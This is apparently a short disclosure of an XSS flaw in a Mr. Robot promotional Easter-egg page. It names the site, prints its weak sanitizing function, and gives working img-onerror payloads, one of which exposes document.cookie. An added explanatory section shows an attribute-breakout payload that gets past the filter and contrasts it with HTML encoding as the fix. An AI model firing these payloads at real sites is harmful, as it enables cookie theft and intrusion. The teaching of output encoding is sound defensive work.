- Season 2, Episode 6 Mr. Robot Easter egg has an XSS vulnerability. FSociety wrote a weak
- function for sanitizing user input into their virtual shell ;)
- The Easter-egg can be accessed here:
- http://l4713116.e-corp-usa.com/x/
- The sanitize function:
- function cleanInput(e){
-   // tmp is assigned without var/let, so it leaks as a global; kept as written
-   return tmp = striptags(e),                       // 1st pass: striptags library removes tags
-     tmp.replace(/<[^>]+>/gi, "")                   // 2nd pass: drop any remaining complete <...> tag
-        .replace(/<script.*<\/script>/gi, "")      // 3rd pass: drop <script>...</script> (same line only, no "s" flag)
-        .replace(/<>/gi, "");                       // 4th pass: drop a literal "<>"
- }
- XSS Payload:
- "0xUID <3's Mr. Robot":
- '">><marquee><img src=mrrobot onerror=confirm(String.fromCharCode(48,120,85,73,68,32,60,51,39,115,32,77,114,46,32,82,111,98,111,116))></marquee>">
- Confirm dialog displaying the user's cookie:
- '">><marquee><img src=mrrobot onerror=confirm(document.cookie)></marquee>">
- @0xUID
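Added example, not code from the paste or from the Easter-egg page: it models the regex stages of cleanInput() above (the striptags() call is replaced by a minimal stand-in so the block runs offline; this is an assumption, not the real library), puts the output into a constructed attribute sink (the real markup of the shell is not on the page), and contrasts it with HTML-entity encoding. It goes one step beyond the paste's payload: a blacklist of tags never fires on input that contains no "<" at all, so an attribute-context breakout passes the cleaner untouched, while encoding handles both cases.

```javascript
// Stand-in for the striptags() call in the paste (assumption: NOT the real
// striptags npm library, just enough to let cleanInput() run offline).
function striptagsStandIn(s) {
  return s.replace(/<[^>]*>/g, "");
}

// The paste's cleaner with the comma expression unrolled. Behaviour kept:
// it is a blacklist that strips markup instead of encoding it.
function cleanInput(e) {
  const tmp = striptagsStandIn(e);
  return tmp
    .replace(/<[^>]+>/gi, "")
    .replace(/<script.*<\/script>/gi, "")
    .replace(/<>/gi, "");
}

// Hardened alternative: encode for the HTML context instead of stripping.
// Quotes are encoded too, so attribute values cannot be broken out of.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Constructed sink: the shell echoes the last command into a value="" attribute.
function renderInAttribute(value) {
  return '<input value="' + value + '">';
}

// The paste's cookie payload (tag-based) and a constructed attribute-breakout
// payload that contains no "<" and therefore never matches any of the regexes.
const TAG_PAYLOAD =
  '\'">><marquee><img src=mrrobot onerror=confirm(document.cookie)></marquee>">';
const ATTR_PAYLOAD = '" onfocus=alert(1) autofocus x="';

function weakMarkup(payload) {
  return renderInAttribute(cleanInput(payload));
}

function safeMarkup(payload) {
  return renderInAttribute(escapeHtml(payload));
}

// Quick self-check when run directly: the blacklist leaves the attribute
// payload byte-for-byte intact, the encoder leaves no "<" or '"' behind.
console.log(cleanInput(ATTR_PAYLOAD) === ATTR_PAYLOAD);   // true
console.log(weakMarkup(ATTR_PAYLOAD));                    // onfocus handler injected
console.log(safeMarkup(ATTR_PAYLOAD));                    // inert attribute value
console.log(safeMarkup(TAG_PAYLOAD));                     // inert attribute value
```

The point of the comparison: stripping is a blacklist against the HTML parser, and it only ever covers the tag context. Output encoding for the exact context the string lands in (text node, attribute, or better still assigning via textContent / value rather than building markup) is the control that actually removes the injection.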